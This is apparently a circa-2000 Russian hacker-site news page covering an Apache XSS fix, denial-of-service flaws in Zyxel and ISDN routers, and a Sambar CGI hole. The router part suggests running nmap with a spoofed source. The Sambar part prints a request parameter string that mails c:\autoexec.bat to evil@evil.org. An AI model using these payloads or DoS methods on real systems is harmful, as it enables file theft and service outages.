Главная
Архив новостей
Безопасность в Unix
Безопасность в Windows
Сборник FAQ'ов
Телефония, фрикинг
Кредитные карты
Криптография
Истории о хакерах
Программы, утилиты
_el@sp.sz.ru

RB2 Network

APACHE 1.3.12, Zyxel DoS, SAMBAR & CGI




ВЫШЕЛ APACHE 1.3.12 Apache 1.3.12: Была выпущена новая версия популярного httpd. В ней ликвидирована возможность того самого cross-scripting, применяемого, к примеру, системой tx3. Большая опасность этого - возможность подстановки собственных данных в страницу, которая передаётся через SSL-соединение. Путём несложной передачи данных как параметра методом GET своему скрипту атакующий легко может получить содержимое страницы. Подробная документация CERT находится по адресу : http://www.cert.org/advisories/CA-2000-02.html.

Уязвимости роутеров:

Роутеры ISDN RH348 и RT328, а так же ZyxelP128imh подвержены DoS, которое может быть осуществлено большим количеством различных способов. При SYN-сканировании роутера он перестаёт отвечать на соединения в течении 5 минут. Естественно, можно и нужно запускать nmap c опцией -S ;)

При простом соединении с портом 23 никто более не может подсоединиться к роутеру, даже если вы не прошли аутенификацию.

При получении большого количества ICMP-редиректов роутер перестанет выполнять свои функции и требует около 30 секунд на восстановление.

Для ликвидации уязвимостей требуется установить в Access Control List'e только вашу станцию, и запретить соединения с других.

Очередная уязвимость в httpd sambar. Скрипт /cgi-bin/mailit.pl, стоящий на данном сервере по умолчанию, позволяет читать файлы с диска системы, на которой стоит этот сервер: этот скрипт является системой отправки почты, и передача скрипту параметров можно заставить сервер отправлять данные кому-либо на почту.
server=smtp.example.com&
from=root@example.com&
recipient=evil@evil.org&
subject=Hi&body=Hello+World%0
A&attach=c:\autoexec.bat


 duke

Team Void


<== Back to main page